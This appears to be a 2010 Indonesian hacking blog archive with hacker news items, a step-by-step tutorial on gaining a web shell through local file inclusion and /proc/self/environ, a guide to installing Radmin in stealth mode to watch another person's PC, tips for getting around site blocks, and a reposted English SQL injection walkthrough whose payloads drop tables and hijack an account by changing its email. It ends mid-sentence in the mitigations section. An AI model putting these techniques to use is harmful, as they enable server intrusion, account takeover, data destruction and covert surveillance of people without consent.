Tampilkan postingan dengan label Hackers. Tampilkan semua postingan
Tampilkan postingan dengan label Hackers. Tampilkan semua postingan

Senin, 12 Juli 2010


Viandraminerva,ISLAMABAD - Pihak otoritas Pakistan mengumumkan telah berhasil menangkap sedikitnya 5 orang yang diduga terlibat dalam kelompok hacker internasional.

Menurut mereka, jaringan kelompok ini sudah beraksi sejak lama, dan mereka sudah merusak ribuan situs nasional maupun internasional. Selain merusak laman situs, mereka juga teridentifikasi sering melakukan penipuan secara online.

"Lima orang yang kami tangkap berasal dari salah satu kelompok yang teridentifikasi bernama Pakbugs. Kami menangkapnya saat melakukan operasi bersama dengan negara-negara lain," terang pejabat Federal Investigation Agency(FIA) Mian Idrees, seperti yang dilansir AFP, Senin (12/7/2010).

Selain menangkap lima anggota kelompok hacker internasional tersebut, pihak yang berwenang juga melakukan penyitaan terhadap berbagai macam peralatan yang digunakan oleh penjahat cyber tersebut dalam menjalankan aksinya.

"Kelompok ini terlibat dalam pembajakan atau perusakan ribuan web milik pemerintah, non-pemerintah dan organisasi internasional. Mereka juga terlibat dalam penipuan kartu kartu kredit," tambah Idrees.

Dari hasil investigasi diketahui, kalau kelompok Hacker Pakbugs berbasis di Arab Saudi dan didirikan oleh awad Ehsan alias Humza. Namun demikian, pihak berwajib memastikan tidak ada hubungannya antara kelompok hacker ini dengan terorisme cyber.

Kamis, 08 Juli 2010


Viandraminerva,HELSINKI - Situs Pirate Bay yang selama ini dikenal sebagai 'gudang bajakan' kena batunya. Kali ini bukan karena razia besar-besaran yang dilakukan oleh kepolisian Swedia, tapi situs tersebut dibobol oleh kelompok Hacker asal Argentina.

Kelompok Hacker asal Argentina tersebut mengklaim telah membobol database Pirate Bay dengan menggunakan SQL Injection yang memanfaatkan sejumlah lubang di sistem situs tersebut. hacker mendapatkan nama pengguna, password serta alamat email dan IP pengguna.

Softpedia, Kamis (8/7/2010) melansir, Hacker tersebut menamakan diri Ch Russo yang berasal dari Buenos Aires Argentina. Menurutnya, celah keamanan Pirate Bay ditemukan kelompok hacker dimana ia bernaung.

Kelompok tersebut hingga saat ini belum dihubungi oleh Pirate bay sejak terjadinya pembobolan. Russo menyatakan bahwa hingga saat ini Pirate bay belum sepenuhnya memperbaiki celah-celah keamanan yang ada.

Russo mengatakan, ia bisa saja mengubah dan memodifikasi data pemilik akun dengan teknik yang sama.

"Kami sama sekali tak berniat menjual akun-akun tersebut, informasi mereka masih aman hingga sekarang," kata Russo.

Pirate bay terus menjadi sorotan sejak kemunculannya. Kasus terakhir pada Mei 2010. Ketika itu, CyberBunker, penyedia layanan IP transit diperintahkan pengadilan untuk mematikan akses ke Pirate Bay

Senin, 28 Juni 2010


Udah Lama Nich Viandraminerva tidak Posting, tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja...

1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.

contoh : http://site.com/info.php?file=news.php

2. coba kita ganti "news.php" dengan "../../../".

contoh : http://site.com/info.php?file=../../../

lalu kita mendapat error, seperti berikut...

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?
mari kita coba...

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti "/etc/passwd" dengan "/proc/self/environ"

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
lalu pada user-agent isikan dengan kode berikut :



atau



lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

http://www.site.com/shell.php

happy hacking !

Rabu, 16 Juni 2010


Cyber Crime -Tindakan kriminal yang dilakukan melalui Dunia Maya ini sepertinya semakin lama semakin berbahaya. Salah satu pengembang perangkat lunak terkemuka, Symantec, mengungkap 10 fakta serius mengenai keamanan internet yang tidak dapat diabaikan hingga Maret 2010 ini.
Berdasarkan keterangan tertulis Symantec yang diterima oleh detik.NET, Senin (8/3/2010), para penjahat cyber terus mencari cara-cara baru serta canggih untuk menyerang pengguna internet kelas konsumer dan enterprise.

Misalkan saat gempa Haiti beberapa saat lalu. Banyak spammer memanfaatkan kejadian tersebut, untuk mengeruk keuntungan pribadi. Belum lagi munculnya platform-platform baru seperti iPad, yang menambah serangan berbasis SEO (search engine optimization).

Berikut adalah 10 fakta serius mengenai keamanan yang tidak dapat diabaikan pada 2010:

1. Serangan Cyber Merugikan Banyak Perusahaan. 75% perusahaan besar menderita akibat serangan cyber dalam 12 bulan terakhir, dengan kerugian rata-rata mencapai US$2 juta per tahun.

2. Pergeseran Spam Global. Asia Pasific, Jepang serta Amerika Selatan mengambil alih posisi Amerika Utara dan EMEA sebagai sumber spam tersebesar.

3. Urutan Tertinggi dalam Daftar Aktivitas Jahat. China menempati urutan tertinggi dalam aktivitas jahat, mencapai 25% dari total di seluruh dunia.

4. Kartu Kredit Paling Laris Diperdagangkan. Informasi kartu kredit adalah yang paling umum diiklankan untuk diperjualbelikan di ekonomi bawah tanah, mencapai 18% dari seluruh barang dan layanan.

5. Bank-bank Menjadi Sasaran Phishing. 76% merek yang digunakan dalam serangan phishing pada 2010 berada di sektor keuangan.

6. Spam Tradisional Hilang, Scam dengan Target Khusus Muncul. Jumlah total pesan scam dan phishing mencapai 21% dari seluruh spam, merupakan yang tertinggi sejak 2007.

7. Agenda Baru Mendorong Serangan. Gempa di Haiti telah meningkatkan volume pesan scam dan phishing ketika spammer menggunakan kejadian tragis ini untuk mengeruk keuntungan.

8. Asia Pasifik dan Jepang rentan diserang. Asia Pasifik dan Jepang adalah daerah dengan serangan berbasis web terbesar pada Oktober-Desember 2009.

9. Semakin Populernya Sebuah Platform Baru akan Mendorong Serangan. Ketika pencarian istilah iPad meningkat, serangan berbasis SEO (search engine optimization) dan phishing teramati selama peluncuran Apple iPad.

10. Para Penjahat Cyber Mencuri Informasi, Bukan Infrastruktur. Pencurian kekayaan intelektual dilaporkan merupakan kerugian cyber terbesar di kalangan dunia bisnis Singapura.

Sabtu, 12 Juni 2010

Btw tulisan ini dibuat untuk menjawab pertanyaan yang pernah ditanyakan
Kepada penulis tentang remote antar Client [ LAN ],

Tulisan ini untuk menerangkan cara pembuatan Remote untuk mengontrol PC client , dimana akan kita ambil contoh penginstalan software RADMIN [ remote admin ] karena software itu paling sering digunakan oleh kita semua [ btw penulis nyubi habis ],

Kilas balik ke tahun lalu , waktu penulis berkunjung ke rumah kawan [ cwek loh ] dia sangat kesal karena setiap aktivitas yang dilakukannya di di depan computer kerja selalu terlihat walau dia sama sekali tidak tahu sampai-sampai untuk urusan email yang bersifat rahasia dilihat juga [ gimana ga kesal L] ,So dia coba Tanya ke penulis kok sampai tahu seh orang IT di tempat dia bekerja [ administrasi di salah satu kampus computer ] segala kegiatan dia selama di depan computer, sampai-sampai dia merasa orang IT di tempat dia bekerja mengetahui user sama password email dia [ wedew jangan-jangan ada yang rahasia ] J.
Penulis coba terangkan sebisa mungkin rahasia mereka karena penulis tidak mau kawan dibodohi dengan ulah para IT yang selalu mengawasi kegiatan para karyawannya [ kalau hanya sekedar memantau kegiatan karyawannya yang bermain game di waktu bekerja she hal wajar, tapi kalau sampai memantau hal yang bersifat rahasia wah itu uda kelewatan ],
Btw langsung aja kita coba lakukan install remote oleh software RADMIN version 3.
[ baru sempet buat tutornya , maklum Sibuk ]

Siapkan Samsu + Kopi + Pecel Lele, btw langsung menuju situs radmin yang terletak di www.famatech.com, ambil versi trial untuk 30 hari [ Full Lisensi cari di Google ] ,

Disana nanti ada 2 buah file yaitu rserv30 dan rview30, untuk melihat client kita install rview30 dan untuk target kita install rserv30, btw langung install rview30 di depan computer kita, lihat hasil installan dibawah ini jalankan:

Setelah Beres, kemudian beralih ke pc target install rserv30 di pc target , kemudian
jalankan software tersebut:

kita bisa setting konfigurasi dari menu target , cek satu persatu,
Startup mode untuk menjalankan remote dari stealth, biarkan saja akan berjalan secara otomatis, Option untuk mensetting port yang akan digunakan, chatt config, log history, dll, untuk port harus setting dari client dan server, contoh option liat dibawah ini:

Permission untuk melakukan setting password, yang berfungsi untuk memberikan keamanan kepada server [ kerennya mah orang biar ga tahu kalo buka radmin view ],

ada 2 security mode , Radmin security berbasis Win9x, dan Windows NT security
untuk berbasis Win2k [ Server NT ], btw kita setting yang umum aja , pakai radmin security , klik permissions

Isi nama dan password , terserah , kemudian klik OK, kemudian klik All access maka kita dapat melakukan control penuh terhadap target

Nah setelah kita selesai setting, maka kita coba melakukan koneksi ke pc target [ wedew kesannya serem banget ]

untuk mengetahui IP target anda dapet lakukan dengan cara melihat properti di My Network Places dengan klik kanan kemudian klik kanan Local Area Connection, lihat Internet Protocol [ TCP /IP ] ga susah , daripada make under DOS [ kan belajar simple dan praktis ] J.

Setelah dapat silakan anda tambahkan di dalam kolom RadminView add IP target kemudian klik ok [ akan nampak hasilnya seperti diatas ], trus anda tinggal arahkan mau diapakan tuh pc target bisa Full Control, ViewControl, Chatt, telnet, File transfer , Restat, ShutDown, Dll pokoknya ada semua J, nah untuk masuk ke pc target akan diminta password dan user [ ini user dan password yang tadi kita setting ] mengapa memakai password ? jawabannya simple agar orang lain selain bukan anda tidak bisa melihat –lihat pc yang kita remote tadi.

Dibawah ini merupakan hasil dari monitoring client, kita bisa lakukan remote untuk bermacam2 keperluan:

Nah semua yang berhubungan dengan aktifitas mata – mematai membutuhkan port untuk bisa koneksi dari Server ke Client , untuk pemakaian default RADMIN menggunakan port 4899, nah untuk mematikan secara darurat bisa dengan menghidupkan firewall di pc target , maka akan otomatis port 4899 terblock yang menyebabkan koneksi dari server ke client mati [ remotenya tidak bisa hidup ]

Sekian semoga tutorial ini bisa mengobatin hati kawan yang sangat kecewa terhadap tempat dia bekerja [ heueheu padahal udah keluar dia dari kerjaannya ]



Note : Untuk User yang melakukan aktifitas di warnet – warnet agar lebih berhati-hati karena sebagian besar Operator warnet sering memata – matai anda , dan para IT yang bekerja di perusahaan agar lebih bijak menggunakan remote untuk keperluan perusahaan [ atau memang IT –nya mau cari muka sama bos, kekkekke just kidding ]
Segala kegiatan memata – matai client entah mau memakai software radmin, Vpn, easyremote, or sejenisnya bagaikan pisau bermata dua, tergantung dari Etika dan Moral yang mnggunakannya [ wedew kaya ulama aja, ]

Selasa, 06 April 2010


Mungkin banyak yang kecewa dengan di blockirnya akses jalan untuk membuka website YouTube, MySpace, Multiply, Rapidshare dan Metacafe. Dengan alasan penyebaran film fitnah, pemerintah tanpa mikir panjang memblockir website-website tersebut. Tetapi mengapa websitenya yang di block?? mengapa bukan konten atau video film fitnah yang dihapus? Sebenarnya pemerintah dapat bekerja sama dengan YouTube, MySpace, Multiply, Rapidshare dan Metacafe. untuk menghambat penyebaran film fitnah, bukan dengan cara memblockir gini.







Your Ad Here

Banyak yang berfikir membuka website YouTube, dll menggunakan WebProxy atau Google Translate bisa berjalan dengan mulus. Tetapi banyak yang kecewa dengan presepsi ini, karena WebProxy atau Google Translate akan memblock semua JavaScript dari website yang kita buka, ingin lepas dari block kok malah kena block!! :) Jika anda ingin mencoba silahkan..
1. Coba anda membuka Google Translate atau http://youhide.com
2. Masukkan url http://youtube.com
3. Tekan Enter

Setelah anda menekan Enter apa yang terjadi? yup.. website YouTube terbuka, tetapi apa yang terjadi saat anda ingin memutar video yang ada di YouTube? yup.. video tidak bisa terbuka.. karena untuk menampilkan video YouTube menggunakan JavaScript. Dan tentunya akan diblock oleh WebProxy, sia-sia deh usaha anda!!

Menurut saya, cara aman untuk membuka YouTube, dll adalah dengan menggunakan Proxy Server. Seperti postingan saya yang sebelumnya “Mengakses Youtube Menggunakan Proxy” dijamin dapat berjalan dengan mulus… :)




Kamis, 01 April 2010


A customer asked that we check out his intranet site, which was used by the company's employees and customers. This was part of a larger security review, and though we'd not actually used SQL Injection to penetrate a network before, we were pretty familiar with the general concepts. We were completely successful in this engagement, and wanted to recount the steps taken as an illustration.







Your Ad Here


"SQL Injection " is subset of the an unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises.


We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided.

There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.

The Target Intranet


This appeared to be an entirely custom application, and we had no prior knowledge of the application nor access to the source code: this was a "
blind" attack. A bit of poking showed that this server ran Microsoft's IIS 6 along with ASP.NET, and this suggested that the database was Microsoft's SQL server: we believe that these techniques can apply to nearly any web application backed by any SQL server.

The login page had a traditional
username-and-password form, but also an email-me-my-password link; the latter proved to be the downfall of the whole system.

When entering an email address, the system presumably looked in the user database for that email address, and mailed something to that address. Since my email address is not found, it wasn't going to send me anything.

So the first test in any SQL-ish form is to enter a single quote as part of the data: the intention is to see if they construct an SQL string literally without sanitizing. When submitting the form with a quote in the email address, we get a 500 error (server failure), and this suggests that the "broken" input is actually being parsed literally. Bingo.

We speculate that the underlying SQL code looks something like this:

SELECT fieldlist
FROM table
WHERE field = '$EMAIL';

Here, $EMAIL is the address submitted on the form by the user, and the larger query provides the quotation marks that set it off as a literal string. We don't know the specific names of the fields or table involved, but we do know their nature, and we'll make some good guesses later.

When we enter steve@unixwiz.net' - note the closing quote mark - this yields constructed SQL:
SELECT fieldlist
FROM table
WHERE field = 'steve@unixwiz.net'';
when this is executed, the SQL parser find the extra quote mark and aborts with a syntax error. How this manifests itself to the user depends on the application's internal error-recovery procedures, but it's usually different from "email address is unknown". This error response is a dead giveaway that user input is not being sanitized properly and that the application is ripe for exploitation.

Since the data we're filling in appears to be in the WHERE clause, let's change the nature of that clause in an SQL legal way and see what happens. By entering: anything' OR 'x'='x,

the resulting SQL is:

SELECT fieldlist
FROM table
WHERE field = 'anything' OR 'x'='x';

Because the application is not really thinking about the query - merely constructing a string - our use of quotes has turned a single-component WHERE clause into a two-component one, and the 'x'='x' clause is guaranteed to be true no matter what the first clause is (there is a better approach for this "always true" part that we'll touch on later).

But unlike the "real" query, which should return only a single item each time, this version will essentially return every item in the members database. The only way to find out what the application will do in this circumstance is to try it. Doing so, we were greeted with:

Your login information has been mailed to random.person@example.com.

Our best guess is that it's the first record returned by the query, effectively an entry taken at random. This person really did get this forgotten-password link via email, which will probably come as surprise to him and may raise warning flags somewhere.

We now know that we're able to manipulate the query to our own ends, though we still don't know much about the parts of it we cannot see. But we have observed three different responses to our various inputs:

* "Your login information has been mailed to email"
* "We don't recognize your email address"
* Server error

The first two are responses to well-formed SQL, while the latter is for bad SQL: this distinction will be very useful when trying to guess the structure of the query.
Schema field mapping

The first steps are to guess some field names: we're reasonably sure that the query includes "email address" and "password", and there may be things like "US Mail address" or "userid" or "phone number". We'd dearly love to perform a SHOW TABLE, but in addition to not knowing the name of the table, there is no obvious vehicle to get the output of this command routed to us.

So we'll do it in steps. In each case, we'll show the whole query as we know it, with our own snippets shown specially. We know that the tail end of the query is a comparison with the email address, so let's guess email as the name of the field:

SELECT fieldlist
FROM table
WHERE field = 'x' AND email IS NULL; --';

The intent is to use a proposed field name (email) in the constructed query and find out if the SQL is valid or not. We don't care about matching the email address (which is why we use a dummy 'x'), and the -- marks the start of an SQL comment. This is an effective way to "consume" the final quote provided by application and not worry about matching them.

If we get a server error, it means our SQL is malformed and a syntax error was thrown: it's most likely due to a bad field name. If we get any kind of valid response, we guessed the name correctly. This is the case whether we get the "email unknown" or "password was sent" response.

Note, however, that we use the AND conjunction instead of OR: this is intentional. In the SQL schema mapping phase, we're not really concerned with guessing any particular email addresses, and we do not want random users inundated with "here is your password" emails from the application - this will surely raise suspicions to no good purpose. By using the AND conjunction with an email address that couldn't ever be valid, we're sure that the query will always return zero rows and never generate a password-reminder email.

Submitting the above snippet indeed gave us the "email address unknown" response, so now we know that the email address is stored in a field email. If this hadn't worked, we'd have tried email_address or mail or the like. This process will involve quite a lot of guessing.

Next we'll guess some other obvious names: password, user ID, name, and the like. These are all done one at a time, and anything other than "server failure" means we guessed the name correctly.

SELECT fieldlist
FROM table
WHERE email = 'x' AND userid IS NULL; --';

As a result of this process, we found several valid field names:

* email
* passwd
* login_id
* full_name

There are certainly more (and a good source of clues is the names of the fields on forms), but a bit of digging did not discover any. But we still don't know the name of the table that these fields are found in - how to find out?
Finding the table name

The application's built-in query already has the table name built into it, but we don't know what that name is: there are several approaches for finding that (and other) table names. The one we took was to rely on a subselect.

A standalone query of

SELECT COUNT(*) FROM tabname

Returns the number of records in that table, and of course fails if the table name is unknown. We can build this into our string to probe for the table name:

SELECT email, passwd, login_id, full_name
FROM table
WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';

We don't care how many records are there, of course, only whether the table name is valid or not. By iterating over several guesses, we eventually determined that members was a valid table in the database. But is it the table used in this query? For that we need yet another test using table.field notation: it only works for tables that are actually part of this query, not merely that the table exists.

SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' AND members.email IS NULL; --';

When this returned "Email unknown", it confirmed that our SQL was well formed and that we had properly guessed the table name. This will be important later, but we instead took a different approach in the interim.
Finding some users

At this point we have a partial idea of the structure of the members table, but we only know of one username: the random member who got our initial "Here is your password" email. Recall that we never received the message itself, only the address it was sent to. We'd like to get some more names to work with, preferably those likely to have access to more data.

The first place to start, of course, is the company's website to find who is who: the "About us" or "Contact" pages often list who's running the place. Many of these contain email addresses, but even those that don't list them can give us some clues which allow us to find them with our tool.

The idea is to submit a query that uses the LIKE clause, allowing us to do partial matches of names or email addresses in the database, each time triggering the "We sent your password" message and email. Warning: though this reveals an email address each time we run it, it also actually sends that email, which may raise suspicions. This suggests that we take it easy.

We can do the query on email name or full name (or presumably other information), each time putting in the % wildcards that LIKE supports:

SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' OR full_name LIKE '%Bob%';

Keep in mind that even though there may be more than one "Bob", we only get to see one of them: this suggests refining our LIKE clause narrowly.

Ultimately, we may only need one valid email address to leverage our way in.
Brute-force password guessing

One can certainly attempt brute-force guessing of passwords at the main login page, but many systems make an effort to detect or even prevent this. There could be logfiles, account lockouts, or other devices that would substantially impede our efforts, but because of the non-sanitized inputs, we have another avenue that is much less likely to be so protected.

We'll instead do actual password testing in our snippet by including the email name and password directly. In our example, we'll use our victim, bob@example.com and try multiple passwords.

SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'bob@example.com' AND passwd = 'hello123';

This is clearly well-formed SQL, so we don't expect to see any server errors, and we'll know we found the password when we receive the "your password has been mailed to you" message. Our mark has now been tipped off, but we do have his password.

This procedure can be automated with scripting in perl, and though we were in the process of creating this script, we ended up going down another road before actually trying it.
The database isn't readonly

So far, we have done nothing but query the database, and even though a SELECT is readonly, that doesn't mean that SQL is. SQL uses the semicolon for statement termination, and if the input is not sanitized properly, there may be nothing that prevents us from stringing our own unrelated command at the end of the query.

The most drastic example is:

SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x'; DROP TABLE members; --'; -- Boom!

The first part provides a dummy email address -- 'x' -- and we don't care what this query returns: we're just getting it out of the way so we can introduce an unrelated SQL command. This one attempts to drop (delete) the entire members table, which really doesn't seem too sporting.

This shows that not only can we run separate SQL commands, but we can also modify the database. This is promising.
Adding a new member

Given that we know the partial structure of the members table, it seems like a plausible approach to attempt adding a new record to that table: if this works, we'll simply be able to login directly with our newly-inserted credentials.

This, not surprisingly, takes a bit more SQL, and we've wrapped it over several lines for ease of presentation, but our part is still one contiguous string:

SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x';
INSERT INTO members ('email','passwd','login_id','full_name')
VALUES ('steve@unixwiz.net','hello','steve','Steve Friedl');--';

Even if we have actually gotten our field and table names right, several things could get in our way of a successful attack:

1. We might not have enough room in the web form to enter this much text directly (though this can be worked around via scripting, it's much less convenient).
2. The web application user might not have INSERT permission on the members table.
3. There are undoubtedly other fields in the members table, and some may require initial values, causing the INSERT to fail.
4. Even if we manage to insert a new record, the application itself might not behave well due to the auto-inserted NULL fields that we didn't provide values for.
5. A valid "member" might require not only a record in the members table, but associated information in other tables (say, "accessrights"
), so adding to one table alone might not be sufficient.

In the case at hand, we hit a roadblock on either #4 or #5 - we can't really be sure -- because when going to the main login page and entering in the above username + password, a server error was returned. This suggests that fields we did not populate were vital, but nevertheless not handled properly.

A possible approach here is attempting to guess the other fields, but this promises to be a long and laborious process: though we may be able to guess other "obvious" fields, it's very hard to imagine the bigger-picture organization of this application.

We ended up going down a different road.
Mail me a password

We then realized that though we are not able to add a new record to the members database, we can modify an existing one, and this proved to be the approach that gained us entry.

From a previous step, we knew that bob@example.com had an account on the system, and we used our SQL injection to update his database record with our email address:

SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x';
UPDATE members
SET email = 'steve@unixwiz.net'
WHERE email = 'bob@example.com';

After running this, we of course received the "we didn't know your email address", but this was expected due to the dummy email address provided. The UPDATE wouldn't have registered with the application, so it executed quietly.

We then used the regular "I lost my password" link - with the updated email address - and a minute later received this email:

From: system@example.com
To: steve@unixwiz.net
Subject: Intranet login

This email is in response to your request for your Intranet log in information.
Your User ID is: bob
Your password is: hello

Now it was now just a matter of following the standard login process to access the system as a high-ranked MIS staffer, and this was far superior to a perhaps-limited user that we might have created with our INSERT approach.

We found the intranet site to be quite comprehensive, and it included - among other things - a list of all the users. It's a fair bet that many Intranet sites also have accounts on the corporate Windows network, and perhaps some of them have used the same password in both places. Since it's clear that we have an easy way to retrieve any Intranet password, and since we had located an open PPTP VPN port on the corporate firewall, it should be straightforward to attempt this kind of access.

We had done a spot check on a few accounts without success, and we can't really know whether it's "bad password" or "the Intranet account name differs from the Windows account name". But we think that automated tools could make some of this easier.
Other Approaches

In this particular engagement, we obtained enough access that we did not feel the need to do much more, but other steps could have been taken. We'll touch on the ones that we can think of now, though we are quite certain that this is not comprehensive.

We are also aware that not all approaches work with all databases, and we can touch on some of them here.

Use xp_cmdshell
Microsoft's SQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable.
What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users.
Map out more database structure
Though this particular application provided such a rich post-login environment that it didn't really seem necessary to dig further, in other more limited environments this may not have been sufficient.
Being able to systematically map out the available schema, including tables and their field structure, can't help but provide more avenues for compromise of the application.
One could probably gather more hints about the structure from other aspects of the website (e.g., is there a "leave a comment" page? Are there "support forums"?). Clearly, this is highly dependent on the application and it relies very much on making good guesses.

Mitigations

We believe that web application developers often simply do not think about "surprise inputs", but security people do (including the bad guys), so there are three broad approaches that can be applied here.

Sanitize the input
It's absolutely vital to sanitize user inputs to insure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out some dangerous characters, it's harder to point to all of them.
The language of the web is full of special characters and strange markup (including alternate ways of representing the same characters), and efforts to authoritatively identify all "bad stuff" are unlikely to be successful.
Instead, rather than "
remove known bad data", it's better to "remove everything but known good data": this distinction is crucial. Since - in our example - an email address can contain only these characters:

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
0123456789
@.-_+

There is really no benefit in allowing characters that could not be valid, and rejecting them early - presumably with an error message - not only helps forestall SQL Injection, but also catches mere typos early rather than stores them into the database.

Sidebar on email addresses

It's important to note here that email addresses in particular are troublesome to validate programmatically, because everybody seems to have his own idea about what makes one "valid", and it's a shame to exclude a good email address because it contains a character you didn't think about.

The only real authority is RFC 2822 (which encompasses the more familiar RFC822), and it includes a fairly expansive definition of what's allowed. The truly pedantic may well wish to accept email addresses with ampersands and asterisks (among other things) as valid, but others - including this author - are satisfied with a reasonable subset that includes "most" email addresses.

Those taking a more restrictive approach ought to be fully aware of the consequences of excluding these addresses, especially considering that better techniques (prepare/execute, stored procedures) obviate the security concerns which those "odd" characters present.

Be aware that "sanitizing the input" doesn't mean merely "remove the quotes", because even "regular" characters can be troublesome. In an example where an integer ID value is being compared against the user input (say, a numeric PIN):

SELECT fieldlist
FROM table
WHERE id = 23 OR 1=1; -- Boom! Always matches!

In practice, however, this approach is highly limited because there are so few fields for which it's possible to outright exclude many of the dangerous characters. For "dates" or "email addresses" or "integers" it may have merit, but for any kind of real application, one simply cannot avoid the other mitigations.
Escape/Quotesafe the input
Even if one might be able to sanitize a phone number or email address, one cannot take this approach with a "
name" field lest one wishes to exclude the likes of Bill O'Reilly from one's application: a quote is simply a valid character for this field.
One includes an actual single quote in an SQL string by putting two of them together, so this suggests the obvious - but wrong! - technique of preprocessing every string to replicate the single quotes:

SELECT fieldlist
FROM customers
WHERE name = 'Bill O''Reilly'; -- works OK

However, this naïve approach can be beaten because most databases support other string escape mechanisms. MySQL, for instance, also permits \' to escape a quote, so after input of \'; DROP TABLE users; -- is "
protected" by doubling the quotes, we get:

SELECT fieldlist
FROM customers
